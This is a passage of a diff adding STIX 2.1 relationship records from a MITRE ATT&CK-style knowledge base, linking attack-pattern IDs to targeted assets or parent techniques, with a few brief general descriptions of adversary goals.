"relationship", + "spec_version": "2.1", + "id": "relationship--efbd3c8e-100a-4065-99da-68401ceda158", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--efc605f9-4da3-4420-8233-4c5586c4f23e", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--efea5c54-f788-4917-989f-e50c9ed49daf", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--eff19f74-4940-4c8e-a3b3-b3c16fe3f5e0", + "created": "2023-09-29T16:39:09.447Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:39:09.447Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--efffb08f-d09f-4ad4-be0e-5792aefe73dc", + "created": "2024-06-21T14:12:20.258Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f006c972-d4a0-4bbe-b5ff-985b9aaf5886", + "created": "2024-05-22T17:27:16.267Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T03:37:21.471Z", + "description": "Asset Mapping Rationale: Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. On network devices, Network Device CLI commands such as show users and show ssh can be used to display users currently logged into the device.", + "relationship_type": "targets", + "source_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f026ec35-b025-47c0-8bca-27a8efba5f60", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f03c5158-dd34-4d19-b77a-643a91d30ca8", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f0529b58-ad94-4b6c-be05-e4423ea8f646", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f05a2592-00f9-4f1f-ba55-395af5444b96", + "created": "2023-09-29T17:42:29.179Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:42:29.179Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f066526a-9e5e-4b49-a65e-866dc0340654", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f06779b8-4eb9-4ea0-a284-1b86b7c58011", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f079c0cc-744a-4a89-a596-a2a3d4353fac", + "created": "2024-05-22T17:02:36.183Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-22T17:02:36.183Z", + "description": "Asset Mapping Rationale: Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems.", + "relationship_type": "targets", + "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f086ac88-7ca6-4bc9-871f-61e66f317768", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--035bb001-ab69-4a0b-9f6c-2de8b09e1b9d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f08d487a-7837-48f9-9301-fe0f9f144c92", + "created": "2023-09-28T20:31:04.691Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:31:04.691Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f0a5e284-8f88-4599-acf0-626e94552e00", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24bfaeba-cb0d-4525-b3dc-507c77ecec41", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f0d192f5-1a8d-48ec-ad29-a7025e6cb143", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f0d28b89-ec7a-4aba-acc7-2a04d0faf4e5", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f0d4d23c-2c8c-4731-9b81-7c86fed25b5d", + "created": "2023-09-29T18:45:34.258Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:45:34.258Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f8df6b57-14bc-425f-9a91-6f59f6799307", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f0de546d-67fc-41de-a653-b6e432542068", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f0eb5ae6-92f6-413f-b4e1-5061db6845a9", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f0ee225d-81d5-4612-9b27-b898e1003a16", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f0f714d2-06ba-4754-a313-769aab7e74cb", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f0f9f9f4-ab57-4059-ae46-a298fa007ca6", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f10611e9-4812-4780-a1d5-0ad537dd95fb", + "created": "2023-09-28T21:23:01.421Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:23:01.421Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f12e01f4-20fe-4ecb-be1f-6b2dc919c350", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f13b1dd5-f350-446a-bed9-5745b7f0160a", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5e59c4-abe7-40c7-8196-e373cb1e5974", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f13dac1a-090b-40c6-9093-eb4abe0deba8", + "created": "2023-09-28T21:24:22.815Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:24:22.815Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f146678f-74a4-4290-8de1-fd2952ca8b23", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f14988ed-465d-494a-862b-ac5feb84f92f", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ce4b7013-640e-48a9-b501-d0025a95f4bf", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f16a52aa-9732-408b-88c8-44fc639643dc", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f16ddcc6-4a71-4950-802d-0f706ba9a0e0", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f1793a83-f51c-48d4-b11e-ee9c93a28e71", + "created": "2023-07-20T15:30:58.855Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-07-20T15:30:58.855Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--43f2776f-b4bd-4118-94b8-fee47e69676d", + "target_ref": "attack-pattern--40597f16-0963-4249-bf4c-ac93b7fb9807", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f189e2f8-49b0-43cd-a77c-bcab2ea909aa", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f18ac720-632d-4761-89b1-258a67710a1b", + "created": "2020-01-24T19:46:28.013Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f19c34b2-ef3a-4581-b604-6639f501e32f", + "created": "2023-10-02T20:20:32.163Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:20:32.163Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f1aa0c9c-d76e-45c0-91a8-51fcf6a4d14b", + "created": "2024-06-21T14:12:20.266Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3120b9fa-23b8-4500-ae73-09494f607b7d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--f1b32781-5cc4-40b3-a9b9-af069657665a", + "created": "2020-10-02T14:55:43.967Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": 